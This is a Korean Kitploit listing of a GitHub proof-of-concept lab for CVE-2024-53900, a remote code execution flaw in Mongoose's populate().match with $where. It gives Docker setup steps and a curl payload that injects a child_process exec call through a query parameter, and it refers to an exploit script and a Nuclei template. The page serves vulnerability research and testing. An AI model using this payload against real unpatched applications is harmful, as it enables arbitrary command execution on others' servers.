Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-53900 — CVE-2024-53900에 대한 재현 가능한 환경과 PoC로, Mongoose의 populate().match $where를 통한 치명적인 RCE입니다. 자동화된 익스플로잇 스크립트와 보안 테스트용 Nuclei 템플릿을 포함합니다. | Kitploit
도구/GitHubGitHub/www-spam/cve-2024-53900
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubwww-spam/cve-2024-53900

CVE-2024-53900

CVE-2024-53900에 대한 재현 가능한 환경과 PoC로, Mongoose의 populate().match $where를 통한 치명적인 RCE입니다. 자동화된 익스플로잇 스크립트와 보안 테스트용 Nuclei 템플릿을 포함합니다.

저장소 보기
31년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-53900 - Mongoose populate().match $where RCE

이 저장소는 Mongoose < 8.8.3에서 발생하는 심각한 원격 코드 실행(RCE) 취약점인 CVE-2024-53900에 대한 재현 가능한 취약 환경과 PoC를 제공합니다.


📌 취약점 세부 정보

  • CVE: CVE-2024-53900
  • 영향받는 버전: Mongoose < 8.8.3
  • 심각도: 심각 (CVSS 9.1)
  • 벡터: populate().match와 $where의 결합
  • 영향: Node.js 컨텍스트에서 임의 JavaScript 실행 (RCE)

참고 자료:

  • GitHub 보안 권고
  • 수정 커밋

🛠️ 설정 지침

1. 저장소 복제

git clone https://github.com/www-spam/CVE-2024-53900.git
cd CVE-2024-53900

2. 환경 시작 (Docker Compose)

docker-compose up -d

📌 GUI PoC (계산기)

기본적으로 취약한 Node.js 앱은 Docker 내에서 실행됩니다.
하지만 GUI 애플리케이션(예: xcalc 또는 gnome-calculator)은 컨테이너 내에서 실행되지 않습니다.

👉 계산기 창을 열어 RCE를 시연하려면:

  1. MongoDB를 Docker에서 실행 (DB 백엔드)

    docker run -d --name mongo -p 27017:27017 mongo:6
    
  2. 취약한 Node.js 앱을 로컬에서 실행

   cd ~/cve-2024/app
   npm install
   node server.js
  • MongoDB는 27017 포트에서 실행됩니다.
  • 취약한 Node.js 앱은 5000 포트에서 실행됩니다.

📂 디렉토리 구조

/home/kali/cve-2024/
├── docker-compose.yml     # 환경 설정
├── exploit.py             # 자동화된 익스플로잇 스크립트
├── CVE-2024-53900.yaml    # Nuclei 템플릿
├── README.md              # 문서
├── app/                   # 취약한 Node.js 앱
│   ├── Dockerfile
│   ├── package.json
│   ├── server.js
│   ├── models.js
│   └── views/
└── data/                  # MongoDB 볼륨

🚀 익스플로잇

수동 테스트

curl "http://localhost:5000/book/{OBJECT_ID}/detail?view[path]=author&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('xcalc')"

자동화된 PoC

python3 exploit.py --url http://localhost:5000

Nuclei 사용

nuclei \ -u http://localhost:5000/book/{{OBJECT_ID}/detail \ -t ~/.local/nuclei-templates/CVE-2024-53900.yaml \ -var pfield=author
이미지

🔒 보안 참고 사항

  • 연구 및 테스트 전용입니다 (프로덕션에는 사용하지 마세요).
  • 페이로드는 안전한 작업(예: 파일 생성)으로 제한됩니다.
  • Docker를 사용하여 완전히 격리됩니다.

✅ 테스트 환경

  • OS: Kali Linux
  • MongoDB: mongo:6
  • Node.js: 18
  • Mongoose: 8.5.0 (취약)
  • Express: 4.18.2

📸 데모

이미지
도구 다운로드